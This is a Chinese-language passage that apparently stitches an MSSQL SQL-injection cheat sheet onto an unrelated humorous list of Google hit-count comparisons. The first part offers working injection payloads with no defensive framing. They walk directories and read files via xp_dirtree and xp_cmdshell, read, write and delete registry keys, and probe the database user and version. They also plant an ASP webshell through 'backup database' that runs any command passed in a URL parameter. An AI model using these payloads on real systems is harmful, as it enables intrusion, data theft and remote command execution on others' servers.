12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容

13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库



16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';

请求的时候，像这样子用：
http://ip/l.asp?c=dir

文章来自：极品人渣

用google搜索时它会告诉你找到多少页面。这里规定找到页面多的一方胜：

布什vs 萨达姆：97万3000对88万5000，布什微弱优势获胜（萨达姆：我要验票）

金庸 vs 琼瑶：42万1000对12万3000，金庸压倒优势 ！

新浪 vs 搜狐：385万对181万，此数据专供纳斯达克股民参考。

qq vs msn：480万对523万，还差一点点，民族软件加油！

开始 vs 结束：969万对284万，有多少开始没有结束？？？

书 vs 电影：946万对305万，纸张的力量！

得到 vs 失去：824万对262万，富有哲理的答案……

中国移动 vs 联通：236万对155万， 与实际力量比有所偏差

足球 vs 篮球：454万对103万，足球还是第一运动啊

1024x768 vs 800x600：426万对525万 这个比较无聊……

午饭 vs 晚饭：9万9700对17万7000，晚饭是正餐嘛。

赵薇 vs 李亚鹏：32万1000对7万7500， 臭名也是名啊~~

病毒 vs 补丁： 305万对94万，完了 悲惨的数据

我爱你 vs 我不爱你：75万对346万，无言…

用户名 vs 密码：363万对482万，这是部分用户经常更改密码所致。

美女 vs 女人：1202万5000对633万6000，哈哈哈哈 这个世界美女比女人还多。

面包 vs 爱情：23万8000对237万，要爱情还是面包？google给了我们答案 爱情万岁！

警察 vs 小偷：326万对29万，十个警察抓一个小偷都抓不完。

鲸鱼是鱼 vs 鲸鱼不是鱼：1万5600对9100，狂汗… … … …

求婚 vs 结婚：11万对76万6000，浪漫没了 麻烦省了 效率高了。

打假 vs 制假：35万5000对7万1000， 恩~~恩~~重拳出击！ ！ ！

战争 vs 和平：132万对121万，愿上帝保佑我们… …

单机 vs 网游：38万对78万6000， 唉~ ~ ~这是好消息还是坏消息。

我有病 vs 我没病：6430对2540，这… … … …看医生去~ ~ ~

http://www.blueidea.com/column/member/2004/1978.asp